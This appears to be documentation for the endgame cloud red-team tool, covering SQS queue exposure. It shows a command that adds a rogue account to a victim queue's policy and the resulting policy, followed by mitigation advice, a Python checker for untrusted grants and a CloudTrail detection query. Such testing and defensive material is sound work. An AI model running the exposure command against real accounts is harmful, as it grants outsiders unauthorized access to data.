- To expose the resource using `endgame`, run the following from the victim account:

```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service iam --name test-resource-exposure
```
- To verify that the SQS queue has been shared with a rogue user, run the following from the victim account:

```bash
export QUEUE_URL=$(aws sqs get-queue-url --queue-name test-resource-exposure | jq -r '.QueueUrl')
aws sqs get-queue-attributes --queue-url "$QUEUE_URL" --attribute-names Policy
```
- Observe that the contents match the example shown below.

The policy below allows the Evil Principal's account ID (999988887777) `sqs:*` access to the victim resource (arn:aws:sqs:us-east-1:111122223333:test-resource-exposure), indicating a successful compromise.

```json
{
    "Attributes": {
        "Policy": "{\"Version\":\"2008-10-17\",\"Id\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure/SQSDefaultPolicy\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"}]}"
    }
}
```
TODO
- Trusted Accounts Only: Ensure that SQS Queues are only shared with trusted accounts, and that the trusted accounts truly need access to the SQS Queue.
- Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
- AWS Access Analyzer: Leverage AWS Access Analyzer to report on external access to SQS Queues. See the AWS Access Analyzer documentation for more details.
- Restrict access to IAM permissions that could lead to exposure of your SQS Queues: Tightly control access to the following IAM actions:
    - `sqs:AddPermission`: Adds a permission to a queue for a specific principal.
    - `sqs:RemovePermission`: Revokes any permissions in the queue policy that match the specified Label parameter.
    - `sqs:GetQueueAttributes`: Gets attributes for the specified queue. This includes retrieving the list of principals who are authorized to access the queue.
    - `sqs:GetQueueUrl`: Returns the URL of an existing queue.
    - `sqs:ListQueues`: Returns a list of your queues.

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here.
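As an added example (not part of endgame or its documentation), the following Python script applies the "Trusted Accounts Only" check to a queue policy: it parses the `Policy` attribute that `get-queue-attributes` returns and reports every `Allow` statement whose AWS principal is outside an allow-list of trusted account IDs. The embedded sample policy is the one captured in the walkthrough above; the function names and the `trusted_accounts` set are assumptions of this example.

```python
import json

# Sample input: the "Policy" attribute returned by the get-queue-attributes
# call in the walkthrough above (victim 111122223333, rogue 999988887777).
SAMPLE_POLICY_JSON = json.dumps({
    "Version": "2008-10-17",
    "Id": "arn:aws:sqs:us-east-1:111122223333:test-resource-exposure/SQSDefaultPolicy",
    "Statement": [
        {"Sid": "AllowCurrentAccount", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:root"}, "Action": "SQS:*",
         "Resource": "arn:aws:sqs:us-east-1:111122223333:test-resource-exposure"},
        {"Sid": "Endgame", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::999988887777:root"}, "Action": "SQS:*",
         "Resource": "arn:aws:sqs:us-east-1:111122223333:test-resource-exposure"},
    ],
})


def aws_principals(principal):
    """Flatten a Principal element to the AWS principals it names (str, list,
    or {"AWS": ...}); Service/Federated entries are a different grant type."""
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        principal = principal.get("AWS", [])
    return [principal] if isinstance(principal, str) else list(principal)


def account_of(principal):
    """12-digit account ID behind an ARN or bare account ID; '*' stays '*'."""
    if principal == "*" or (principal.isdigit() and len(principal) == 12):
        return principal
    parts = principal.split(":")
    return parts[4] if len(parts) >= 6 and parts[0] == "arn" else None


def find_untrusted_grants(policy_json, trusted_accounts):
    """(Sid, principal) pairs from Allow statements whose principal is outside
    trusted_accounts; a bare "*" (anyone) is always reported."""
    statements = json.loads(policy_json).get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be unwrapped
        statements = [statements]
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        for p in aws_principals(stmt.get("Principal", {})):
            if account_of(p) not in trusted_accounts:
                findings.append((stmt.get("Sid", ""), p))
    return findings
```

Running `find_untrusted_grants(SAMPLE_POLICY_JSON, {"111122223333"})` on the walkthrough policy reports the `Endgame` statement and nothing else; pointing it at every queue returned by `sqs:ListQueues` gives a quick cross-account audit alongside Access Analyzer.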
The following CloudWatch Logs Insights query will include exposure actions taken by endgame:

```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='sqs.amazonaws.com' AND (eventName='AddPermission' or eventName='RemovePermission')
```

This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.